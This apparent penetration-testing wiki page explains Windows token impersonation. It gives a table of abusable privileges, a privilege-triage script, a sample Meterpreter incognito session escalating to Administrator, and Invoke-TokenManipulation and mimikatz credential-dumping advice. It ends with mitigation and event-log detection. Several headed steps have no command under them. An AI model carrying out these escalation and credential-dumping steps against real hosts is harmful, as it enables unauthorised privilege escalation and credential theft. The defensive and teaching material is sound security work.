Token Impersonation
Token impersonation is a technique by which a Windows local administrator steals another user's security token (access token) in order to impersonate that user and run commands in their security context. Local administrators hold SeDebugPrivilege, which lets them open any process on the host, including one running as the target user or as SYSTEM, and duplicate its token.
There are certain privileges in Windows that, if held by the current account, let an attacker escalate to SYSTEM or to any other account that has an active, valid token on the system. Several tools exist specifically to abuse these privileges. Note that this is abuse of intended functionality rather than a software bug, so there is no patch for it; the defence is controlling who holds the privileges and which accounts leave tokens on which hosts.
Exploitable Privileges
Certain privileges can be abused either to escalate directly to SYSTEM or to perform actions that are normally restricted (reading or writing protected files, loading drivers, taking ownership of objects). Windows names them with a Privilege suffix (e.g. SeImpersonatePrivilege), and `whoami /priv` shows which ones the current token holds; a privilege shown as Disabled is still held and can be enabled by the process that owns the token. In the table, an Impact of Admin means the privilege gives a direct path to local administrator or SYSTEM; Threat means it grants access that is normally denied and usually needs a further step. SeImpersonate and SeAssignPrimaryToken are typically held by service accounts (IIS, SQL Server and similar) as well as by local administrators, which is why a foothold as a service account is often enough to reach SYSTEM.

| Privilege | Impact | Tool |
|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd party tool |
| SeImpersonate | Admin | 3rd party tool |
| SeBackup | Admin / Threat: read any file regardless of its ACL (e.g. the SAM and SYSTEM hives) | Built-in commands, 3rd party tool |
| SeCreateToken | Admin | 3rd party tool |
| SeDebug | Admin | PowerShell |
| SeLoadDriver | Admin | 3rd party tool |
| SeRestore | Admin | PowerShell |
| SeTakeOwnership | Admin | Built-in commands |
| SeTcb | Admin | 3rd party tool |
The full list is here:
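A quick triage check for the table above, added here as an example (it is not code from the original page): it parses the output of `whoami /priv` and reports which of the listed privileges the current token holds, whether they are currently enabled or not. The privilege-to-impact map, the function name and the sample output are the example's own constructions.

```powershell
# Added example, not from the original page: flag exploitable privileges in the
# output of `whoami /priv`. The impact strings summarise the table above.
$ExploitablePrivileges = @{
    'SeAssignPrimaryTokenPrivilege' = 'Admin: assign a stolen token to a new process'
    'SeImpersonatePrivilege'        = 'Admin: impersonate any token you can obtain'
    'SeBackupPrivilege'             = 'Admin/Threat: read any file regardless of ACL (SAM/SYSTEM hives)'
    'SeCreateTokenPrivilege'        = 'Admin: forge arbitrary tokens'
    'SeDebugPrivilege'              = 'Admin: open any process (incl. SYSTEM) and duplicate its token'
    'SeLoadDriverPrivilege'         = 'Admin: load a kernel driver'
    'SeRestorePrivilege'            = 'Admin: write any file regardless of ACL'
    'SeTakeOwnershipPrivilege'      = 'Admin: take ownership of any securable object'
    'SeTcbPrivilege'                = 'Admin: act as part of the operating system'
}

function Get-ExploitablePrivileges {
    param(
        # Lines of `whoami /priv` output; pass the command output directly.
        [Parameter(Mandatory)] [string[]] $WhoamiPrivOutput
    )
    foreach ($line in $WhoamiPrivOutput) {
        # Data rows look like: "SeDebugPrivilege   Debug programs   Enabled"
        if ($line -match '^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$') {
            $name  = $Matches[1]
            $state = $Matches[2]
            if ($ExploitablePrivileges.ContainsKey($name)) {
                [pscustomobject]@{
                    Privilege = $name
                    # Disabled means held but not enabled; the holder can enable it.
                    State     = $state
                    Impact    = $ExploitablePrivileges[$name]
                }
            }
        }
    }
}

# Constructed sample in the format of `whoami /priv` (not captured from a real host).
$sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeDebugPrivilege              Debug programs                            Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
'@ -split "`r?`n"

Get-ExploitablePrivileges -WhoamiPrivOutput $sample | Format-Table -AutoSize

# On a live host:
# Get-ExploitablePrivileges -WhoamiPrivOutput (whoami /priv)
```

On the constructed sample the function reports SeImpersonatePrivilege (Enabled) and SeDebugPrivilege (Disabled); the second one matters just as much, since a process can enable a privilege its token already holds.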
Using Metasploit
In your meterpreter shell, load the incognito extension:
List the tokens available to the current session:
Impersonate Administrator:
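The meterpreter session those three steps correspond to, written out here as an added example (it is not a transcript from the original page; the domain and account names are placeholders and the output is constructed to match incognito's format):

```console
meterpreter > getuid
Server username: LAB\svc_web
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\Administrator
LAB\svc_web
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
No tokens available

meterpreter > impersonate_token "LAB\\Administrator"
[+] Delegation token available
[+] Successfully impersonated user LAB\Administrator
meterpreter > getuid
Server username: LAB\Administrator
meterpreter > rev2self
```

Two things to check before relying on this: the backslash in the account name must be doubled inside meterpreter, and only a delegation token can be used to start new processes or to authenticate to other hosts; an impersonation token is valid for local impersonation only. If the token you want is not listed, the session usually lacks the rights to see it; `getsystem` first and list again.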
Invoke-TokenManipulation
Impersonates a domain user's token from an elevated PowerShell session (PowerSploit's Invoke-TokenManipulation). If impersonating the user doesn't work, impersonate SYSTEM instead and then dump credentials using mimikatz.
As a replacement for the last command you could instead do the following, but be wary of special characters in the command line such as "
and ', which have to be escaped or wrapped in the other quote type:
Other Techniques
Mitigation & Detection
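Because the technique needs local administrator rights on a host where the target's token already exists, the main mitigation is keeping privileged accounts from logging on to hosts where lower-tier administrators (or service accounts) operate. On the detection side, a process started with a stolen token via CreateProcessAsUser/CreateProcessWithToken is recorded in Security event 4688 with a Target Subject that differs from the Creator Subject. The query below is an added example (not from the original page) that surfaces such events; it assumes Audit Process Creation is enabled on the host, and the function name and time window are the example's own choices.

```powershell
# Added example, not from the original page: list 4688 process-creation events
# where the new process runs under a different account than its creator.
# Requires "Audit Process Creation" (and, for CommandLine, "Include command
# line in process creation events"). Field names are the documented 4688
# EventData fields; the default window of 24 hours is an assumption.
function Find-TokenSwitchedProcessStarts {
    param([int] $Hours = 24)

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4688
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        # Target Subject is the NULL SID (S-1-0-0) / "-" unless the process was
        # created with a token other than the creator's own. Older OS versions
        # do not log these fields at all, hence the null check.
        if ($d.TargetUserSid -and $d.TargetUserSid -ne 'S-1-0-0' -and
            $d.TargetUserName -ne $d.SubjectUserName) {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                Creator     = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                RunsAs      = "$($d.TargetDomainName)\$($d.TargetUserName)"
                Parent      = $d.ParentProcessName
                NewProcess  = $d.NewProcessName
                CommandLine = $d.CommandLine
            }
        }
    }
}

Find-TokenSwitchedProcessStarts -Hours 24 | Format-Table -AutoSize
```

Expect legitimate hits from services.exe, svchost.exe (scheduled tasks), winlogon.exe and runas; baseline those by parent process and treat a user-launched parent such as powershell.exe or cmd.exe starting a process as another account as the signal to investigate.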